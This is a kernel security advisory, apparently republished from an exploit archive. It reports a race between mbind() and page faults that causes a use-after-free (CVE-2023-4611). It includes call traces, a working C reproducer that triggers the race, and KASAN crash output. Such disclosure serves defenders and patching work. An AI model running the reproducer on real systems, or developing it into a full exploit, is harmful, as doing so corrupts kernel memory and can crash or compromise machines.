Share
## https://sploitus.com/exploit?id=PACKETSTORM:189868
(tested on git master, at commit 57012c57536f)
    
    Summary:
    There's a race between mbind() and VMA-locked page faults, leading to UAF.
    You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.
    I'll send a suggested patch in a minute.
    
    mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:
    
    sys_mbind  
      kernel_mbind  
        do_mbind  
          mmap_write_lock  
          mbind_range [for each vma in range]  
            vma_replace_policy  
              new = mpol_dup(...)  
              old = vma->vm_policy  
              vma->vm_policy = new  
              mpol_put(old)  
          mmap_write_unlock
    
    VMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:
    
    do_user_addr_fault  
      lock_vma_under_rcu  
      handle_mm_fault  
        __handle_mm_fault  
          handle_pte_fault  
             do_pte_missing  
               do_anonymous_page  
                 vma_alloc_zeroed_movable_folio  
                   vma_alloc_folio  
                     get_vma_policy  
                       __get_vma_policy  
                         pol = vma->vm_policy    ***race***  
                         mpol_get(pol) [conditional on MPOL_F_SHARED]  
                     [do page allocation]  
                     mpol_cond_put(pol)  
      vma_end_read
    
    Because of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.
    
    You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:
    
    // gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall  
    #define _GNU_SOURCE  
    #include <pthread.h>  
    #include <err.h>  
    #include <unistd.h>  
    #include <sys/syscall.h>  
    #include <sys/mman.h>  
    #include <linux/mempolicy.h>  
      
    #define SYSCHK(x) ({          \  
      typeof(x) __res = (x);      \  
      if (__res == (typeof(x))-1L) \  
        err(1, "SYSCHK(" #x ")"); \  
      __res;                      \  
    })  
      
    static char *vma;  
      
    static void *fault_thread(void *arg) {  
      while (1) {  
        // fault in...  
        *vma = 1;  
        // ... and zero the PTE again with zap_page_range_single()  
        SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));  
      }  
    }  
      
    static void mbind_vma(unsigned long policy) {  
      unsigned long nmask = (1UL << 0);  
      SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));  
    }  
      
    int main(void) {  
      vma = SYSCHK(mmap((void*)0x100000, 0x1000,  
            PROT_READ|PROT_WRITE|PROT_EXEC,  
            MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  
      pthread_t thread;  
      if (pthread_create(&thread, NULL, fault_thread, NULL))  
        errx(1, "pthread_create");  
      
      while (1) {  
        mbind_vma(MPOL_BIND);  
        mbind_vma(MPOL_INTERLEAVE);  
      }  
    }  
    
    This will give the following splat:
    
    BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220  
    Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556  
      
    CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304  
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014  
    Call Trace:  
     <TASK>  
     dump_stack_lvl+0x36/0x50  
     print_report+0xcf/0x660  
    [...]  
     kasan_report+0xc7/0x100  
    [...]  
     vma_alloc_folio+0x93/0x220  
     __handle_mm_fault+0x71b/0x1060  
    [...]  
     handle_mm_fault+0xbe/0x280  
     do_user_addr_fault+0x196/0x630  
     exc_page_fault+0x5c/0xc0  
     asm_exc_page_fault+0x26/0x30  
    [...]  
     </TASK>  
      
    Allocated by task 555:  
     kasan_save_stack+0x33/0x60  
     kasan_set_track+0x25/0x30  
     __kasan_slab_alloc+0x6e/0x70  
     kmem_cache_alloc+0xf5/0x260  
     __mpol_dup+0x72/0x1c0  
     vma_replace_policy+0x20/0xb0  
     do_mbind+0x379/0x510  
     kernel_mbind+0x11a/0x130  
     do_syscall_64+0x3b/0x90  
     entry_SYSCALL_64_after_hwframe+0x6e/0xd8  
      
    Freed by task 555:  
     kasan_save_stack+0x33/0x60  
     kasan_set_track+0x25/0x30  
     kasan_save_free_info+0x2b/0x50  
     __kasan_slab_free+0x10a/0x180  
     kmem_cache_free+0xaa/0x380  
     vma_replace_policy+0x87/0xb0  
     do_mbind+0x379/0x510  
     kernel_mbind+0x11a/0x130  
     do_syscall_64+0x3b/0x90  
     entry_SYSCALL_64_after_hwframe+0x6e/0xd8  
    [...]  
    
    If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.
    
    In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this
    issue is made available to users before the end of the 90-day deadline,
    this bug report will become public 30 days after the fix was made
    available. Otherwise, this bug report will become public at the deadline.
    The scheduled deadline is 2023-10-26.
    
    
    Related CVE Number: CVE-2023-4611.
    
    Credit: Jann Horn